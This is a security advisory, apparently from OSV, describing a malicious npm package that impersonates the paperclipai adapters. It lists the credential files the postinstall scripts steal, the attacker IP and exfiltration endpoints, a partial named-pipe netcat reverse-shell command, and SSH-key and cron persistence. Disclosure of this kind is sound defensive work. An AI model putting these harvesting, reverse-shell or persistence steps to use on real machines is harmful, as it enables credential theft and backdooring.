paperclip-host-utils @1.0.7
Vulnerability report · Last retrieved from osv.dev July 8, 2026 at 7:23 PM UTC
OSV ID
MAL-2026-6947
Ecosystem
npm
Summary
On npm install , package.json's postinstall executes dist/setup.js and dist/postinstall.js. The scripts read installer-side secrets — ~/.aws/credentials, ~/.aws/config, ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.npmrc, ~/.netrc, ~/.git-credentials, ~/.docker/config.json, GitHub Actions runner paths,.github/workflows contents, and the full process.env — and POST them base64-chunked to http://185.112.147.174:8080/npm/v1/security/audits/quick and http://185.112.147.174:8080/exfil (path disguised as an npm audit endpoint). A find sweep across /home/runner, /home/devuser, /work, and /root harvests files matching flag*, *.env, secret*, token*, credentials, and *.kubeconfig — purpose-built for GitHub Actions and CI runners. After exfiltration, a detached shell opens named-pipe reverse shells ( mkfifo /tmp/.f; /bin/sh -i... nc 185.112.147.174 <port> ) in an infinite loop across ports 443, 80, 8080, 7007, 4444, 5555, 1337, and 9001. A sibling routine appends an attacker-controlled ssh-ed25519 key ( deploy@paperclip-host ) to authorized_keys under /root, /home/runner, /home/devuser, /home/paperclip, /home/ec2-user, and /home/centos, and installs /etc/cron.d/paperclip-adapter-sync plus a user crontab entry that calls back to 185.112.147.174:443 every minute. The package name and README impersonate the @paperclipai adapter family as social-engineering cover; the declared dependency @paperclipai/adapter-utils is pinned to a suspicious ^2026.626.0. Any machine or CI runner that runs npm install on this package is credential-compromised and backdoored.
Source: amazon-inspector (b7e57197a05889313009e318f52b5c6831e6ce6ce928553210c489433d2ef87c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.